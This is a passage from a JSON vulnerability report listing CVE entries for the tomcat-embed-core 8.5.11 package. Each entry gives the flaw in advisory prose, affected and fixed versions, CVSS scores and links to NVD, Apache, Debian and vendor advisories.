cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.51"]}],"title":"CVE-2020-1938/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-46589"]}],"cve":"CVE-2023-46589","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2023-11-28T18:30:23","ids":[{"system_name":"CVE Record","text":"CVE-2023-46589"},{"system_name":"NetApp Advisory","text":"ntap-20231214-0009"}],"notes":[{"audience":"developers","category":"other","text":"Inconsistent Interpretation of HTTP Requests","title":"Additional CWE: 444"},{"category":"description","details":"Vulnerability Description","text":"Apache Tomcat Improper Input Validation vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Apache Tomcat Improper Input Validation vulnerability Improper Input Validation vulnerability in Apache Tomcat. Tomcat from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.1.15, from 9.0.0-M1 through 9.0.82, and from 8.5.0 through 8.5.95 did not correctly parse HTTP trailer headers. A trailer header that exceeded the header size limit could cause Tomcat to treat a single request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy.  Users are recommended to upgrade to version 11.0.0-M11 onwards, 10.1.16 onwards, 9.0.83 onwards or 8.5.96 onwards, which fix the issue.  ## Related CVE(s) BIT-tomcat-2023-46589, CVE-2023-46589"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.96"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.96"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/11/28/2"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/0rqq6ktozqc42ro8hhxdmmdjm1k1tpxr"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2024/01/msg00001.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-46589"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-46589"},{"summary":"NetApp Advisory ntap-20231214-0009","url":"https://security.netapp.com/advisory/ntap-20231214-0009"},{"summary":"Openwall Mailing List","url":"https://www.openwall.com/lists/oss-security/2023/11/28/2"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.96"]}],"title":"CVE-2023-46589/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-42795"]}],"cve":"CVE-2023-42795","cwe":{"id":"459","name":"Incomplete Cleanup"},"discovery_date":"2023-10-10T18:31:35","ids":[{"system_name":"CVE Record","text":"CVE-2023-42795"},{"system_name":"Debian Advisory","text":"dsa-5521"},{"system_name":"Debian Advisory","text":"dsa-5522"},{"system_name":"NetApp Advisory","text":"ntap-20231103-0007"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Apache Tomcat Incomplete Cleanup vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Apache Tomcat Incomplete Cleanup vulnerability Incomplete Cleanup vulnerability in Apache Tomcat.  When recycling various internal objects in Apache Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.80 and from 8.5.0 through 8.5.93, an error could cause Tomcat to skip some parts of the recycling process leading to information leaking from the current request/response to the next.  Users are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fixes the issue.  ## Related CVE(s) BIT-tomcat-2023-42795, CVE-2023-42795"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.94"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.94"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2023/10/10/9"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/065jfyo583490r9j2v73nhpyxdob56lw"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00020.html"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-42795"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-42795"},{"summary":"NetApp Advisory ntap-20231103-0007","url":"https://security.netapp.com/advisory/ntap-20231103-0007"},{"summary":"Debian Advisory dsa-5521","url":"https://www.debian.org/security/2023/dsa-5521"},{"summary":"Debian Advisory dsa-5522","url":"https://www.debian.org/security/2023/dsa-5522"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"LOW","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.94"]}],"title":"CVE-2023-42795/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-25122"]}],"cve":"CVE-2021-25122","cwe":{"id":"200","name":"Exposure of Sensitive Information to an Unauthorized Actor"},"discovery_date":"2021-06-16T17:45:29","ids":[{"system_name":"CVE Record","text":"CVE-2021-25122"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"Debian Advisory","text":"dsa-4891"},{"system_name":"Gentoo Advisory","text":"glsa-202208-34"},{"system_name":"NetApp Advisory","text":"ntap-20210409-0002"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Exposure of Sensitive Information to an Unauthorized Actor in Apache Tomcat"},{"category":"details","details":"Vulnerability Details","text":"# Exposure of Sensitive Information to an Unauthorized Actor in Apache Tomcat When responding to new h2c connection requests, Apache Tomcat versions 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41 and 8.5.0 to 8.5.61 could duplicate request headers and a limited amount of request body from one request to another meaning user A and user B could both see the results of user A's request.  ## Related CVE(s) BIT-tomcat-2021-25122, CVE-2021-25122"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.63"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.63"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/03/01/1"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7%40%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7@%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7@%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7b95bc248603360501f18c8eb03bb6001ec0ee3296205b34b07105b7@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcd90bf36b1877e1310b87ecd14ed7bbb15da52b297efd9f0e7253a3b@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd0463f9a5cbc02a485404c4b990f0da452e5ac5c237808edba11c947@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf6d5d57b114678d8898005faef31e9fd6d7c981fcc4ccfc3bc272fc9@%3Cdev.tomcat.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/03/msg00018.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25122"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25122"},{"summary":"Gentoo Advisory glsa-202208-34","url":"https://security.gentoo.org/glsa/202208-34"},{"summary":"NetApp Advisory ntap-20210409-0002","url":"https://security.netapp.com/advisory/ntap-20210409-0002"},{"summary":"Debian Advisory dsa-4891","url":"https://www.debian.org/security/2021/dsa-4891"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.63"]}],"title":"CVE-2021-25122/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-25329"]}],"cve":"CVE-2021-25329","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-03-19T20:11:13","ids":[{"system_name":"CVE Record","text":"CVE-2021-25329"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"Debian Advisory","text":"dsa-4891"},{"system_name":"Gentoo Advisory","text":"glsa-202208-34"},{"system_name":"NetApp Advisory","text":"ntap-20210409-0002"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Potential remote code execution in Apache Tomcat"},{"category":"details","details":"Vulnerability Details","text":"# Potential remote code execution in Apache Tomcat The fix for CVE-2020-9484 was incomplete. When using Apache Tomcat 10.0.0-M1 to 10.0.0, 9.0.0.M1 to 9.0.41, 8.5.0 to 8.5.61 or 7.0.0. to 7.0.107 with a configuration edge case that was highly unlikely to be used, the Tomcat instance was still vulnerable to CVE-2020-9494. Note that both the previously published prerequisites for CVE-2020-9484 and the previously published mitigations for CVE-2020-9484 also apply to this issue.  ## Related CVE(s) BIT-tomcat-2021-25329, CVE-2021-25329"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.61"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.61"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/03/01/2"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r11ce01e8a4c7269b88f88212f21830edf73558997ac7744f37769b77@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r732b2ca289dc02df2de820e8775559abd6c207f159e39f559547a085@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8a2ac0e476dbfc1e6440b09dcc782d444ad635d6da26f0284725a5dc@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb51ccd58b2152fc75125b2406fc93e04ca9d34e737263faa6ff0f41f@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf6d5d57b114678d8898005faef31e9fd6d7c981fcc4ccfc3bc272fc9@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf%40%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cannounce.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfe62fbf9d4c314f166fe8c668e50e5d9dd882a99447f26f0367474bf@%3Cusers.tomcat.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/03/msg00018.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25329"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25329"},{"summary":"Gentoo Advisory glsa-202208-34","url":"https://security.gentoo.org/glsa/202208-34"},{"summary":"NetApp Advisory ntap-20210409-0002","url":"https://security.netapp.com/advisory/ntap-20210409-0002"},{"summary":"Debian Advisory dsa-4891","url":"https://www.debian.org/security/2021/dsa-4891"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"LOCAL","availabilityImpact":"HIGH","baseScore":7.0,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":7.0,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"LOCAL","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"LOW","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"LOW","scope":"UNCHANGED","temporalScore":7.0,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.61"]}],"title":"CVE-2021-25329/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2022-42252"]}],"cve":"CVE-2022-42252","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2022-11-01T12:00:30","ids":[{"system_name":"CVE Record","text":"CVE-2022-42252"},{"system_name":"Gentoo Advisory","text":"glsa-202305-37"}],"notes":[{"audience":"developers","category":"other","text":"Inconsistent Interpretation of HTTP Requests","title":"Additional CWE: 444"},{"category":"description","details":"Vulnerability Description","text":"Apache Tomcat may reject request containing invalid Content-Length header"},{"category":"details","details":"Vulnerability Details","text":"# Apache Tomcat may reject request containing invalid Content-Length header If Apache Tomcat 8.5.0 to 8.5.82, 9.0.0-M1 to 9.0.67, 10.0.0-M1 to 10.0.26 or 10.1.0-M1 to 10.1.0 was configured to ignore invalid HTTP headers via setting rejectIllegalHeader to false (the default for 8.5.x only), Tomcat did not reject a request containing an invalid Content-Length header making a request smuggling attack possible if Tomcat was located behind a reverse proxy that also failed to reject the request with the invalid header.  ## Related CVE(s) BIT-tomcat-2022-42252, CVE-2022-42252"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.83"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.83"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/zzcxzvqfdqn515zfs3dxb7n8gty589sq"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-42252"},{"summary":"Cve 2022","url":"https://nvd.nist.gov/vuln/detail/CVE-2022-42252"},{"summary":"Gentoo Advisory glsa-202305-37","url":"https://security.gentoo.org/glsa/202305-37"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.83"]}],"title":"CVE-2022-42252/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-41080"]}],"cve":"CVE-2023-41080","cwe":{"id":"601","name":"URL Redirection to Untrusted Site"},"discovery_date":"2023-08-25T21:30:48","ids":[{"system_name":"CVE Record","text":"CVE-2023-41080"},{"system_name":"Debian Advisory","text":"dsa-5521"},{"system_name":"Debian Advisory","text":"dsa-5522"},{"system_name":"NetApp Advisory","text":"ntap-20230921-0006"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Apache Tomcat Open Redirect vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Apache Tomcat Open Redirect vulnerability URL Redirection to Untrusted Site ('Open Redirect') vulnerability in FORM authentication feature Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.0.12, from 9.0.0-M1 through 9.0.79 and from 8.5.0 through 8.5.92.  The vulnerability is limited to the ROOT (default) web application.  ## Related CVE(s) BIT-tomcat-2023-41080, CVE-2023-41080"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.93"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.93"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/71wvwprtx2j2m54fovq9zr7gbm2wow2f"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2023/10/msg00020.html"},{"summary":"Cve 2023","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-41080"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-41080"},{"summary":"NetApp Advisory ntap-20230921-0006","url":"https://security.netapp.com/advisory/ntap-20230921-0006"},{"summary":"Debian Advisory dsa-5521","url":"https://www.debian.org/security/2023/dsa-5521"},{"summary":"Debian Advisory dsa-5522","url":"https://www.debian.org/security/2023/dsa-5522"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":6.1,"baseSeverity":"MEDIUM","confidentialityImpact":"LOW","environmentalScore":6.1,"environmentalSeverity":"MEDIUM","integrityImpact":"LOW","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"LOW","modifiedPrivilegesRequired":"NONE","modifiedScope":"CHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"CHANGED","temporalScore":6.1,"temporalSeverity":"MEDIUM","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.93"]}],"title":"CVE-2023-41080/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-1935"]}],"cve":"CVE-2020-1935","cwe":{"id":"444","name":"Inconsistent Interpretation of HTTP Requests"},"discovery_date":"2020-02-28T01:10:48","ids":[{"system_name":"CVE Record","text":"CVE-2020-1935"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Debian Advisory","text":"dsa-4673"},{"system_name":"Debian Advisory","text":"dsa-4680"},{"system_name":"NetApp Advisory","text":"ntap-20200327-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Potential HTTP request smuggling in Apache Tomcat"},{"category":"details","details":"Vulnerability Details","text":"# Potential HTTP request smuggling in Apache Tomcat In Apache Tomcat 9.0.0.M1 to 9.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99 the HTTP header parsing code used an approach to end-of-line parsing that allowed some invalid HTTP headers to be parsed as valid. This led to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. Such a reverse proxy is considered unlikely.  ## Related CVE(s) BIT-tomcat-2020-1935, CVE-2020-1935"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.51"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.51"]},"references":[{"summary":"Open Suse Mailing List","url":"http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r127f76181aceffea2bd4711b03c595d0f115f63e020348fe925a916c%40%3Cannounce.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r441c1f30a252bf14b07396286f6abd8089ce4240e91323211f1a2d75@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r660cd379afe346f10d72c0eaa8459ccc95d83aff181671b7e9076919@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r7bc994c965a34876bd94d5ff15b4e1e30b6220a15eb9b47c81915b78@%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r80e9c8417c77d52c62809168b96912bda70ddf7748f19f8210f745b1@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9ce7918faf347e7aac32be930bf26c233b0b140fe37af0bb294158b6@%3Cdev.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra5dee390ad2d60307b8362505c059cd6a726de4d146d63dfce1e05e7@%3Cusers.tomcat.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc31cbabb46cdc58bbdd8519a8f64b6236b2635a3922bbeba0f0e3743@%3Ccommits.tomee.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd547be0c9d821b4b1000a694b8e58ef9f5e2d66db03a31dfe77c4b18@%3Cusers.tomcat.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/03/msg00006.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/05/msg00026.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-1935"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-1935"},{"summary":"NetApp Advisory ntap-20200327-0005","url":"https://security.netapp.com/advisory/ntap-20200327-0005"},{"summary":"Debian Advisory dsa-4673","url":"https://www.debian.org/security/2020/dsa-4673"},{"summary":"Debian Advisory dsa-4680","url":"https://www.debian.org/security/2020/dsa-4680"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":4.8,"baseSeverity":"MEDIUM","confidentialityImpact":"LOW","environmentalScore":4.8,"environmentalSeverity":"MEDIUM","integrityImpact":"LOW","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"LOW","modifiedIntegrityImpact":"LOW","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":4.8,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N","version":"3.1"},"products":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.51"]}],"title":"CVE-2020-1935/pkg:maven/org.apache.tomcat.embed/tomcat-embed-core@8.5.11?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2023-45648"]}],"cve":"CVE-2023-45648","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2023-10-10T21:31:12","ids":[{"system_name":"CVE Record","text":"CVE-2023-45648"},{"system_name":"Debian Advisory","text":"dsa-5521"},{"system_name":"Debian Advisory","text":"dsa-5522"},{"system_name":"NetApp Advisory","text":"ntap-20231103-0007"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Apache Tomcat Improper Input Validation vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Apache Tomcat Improper Input Validation vulnerability Improper Input Validation vulnerability in Apache Tomcat.  Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.81 and from 8.5.0 through 8.5.93 did not correctly parse HTTP trailer headers. A specially crafted, invalid trailer header could cause Tomcat to treat a single  request as multiple requests leading to the possibility of request smuggling when behind a reverse proxy.  Users are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fix the issue.  ## Related CVE(s) BIT-tomcat-2023-45648, CVE-2023-45648"}],"product_status":{"known_affected":["org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.5.0|<8.5.94"],"known_not_affected":["org.apache.tomcat.embed/tomcat-embed-core@8.5.94"]},"references":[{"summary":"Openwall Mailing 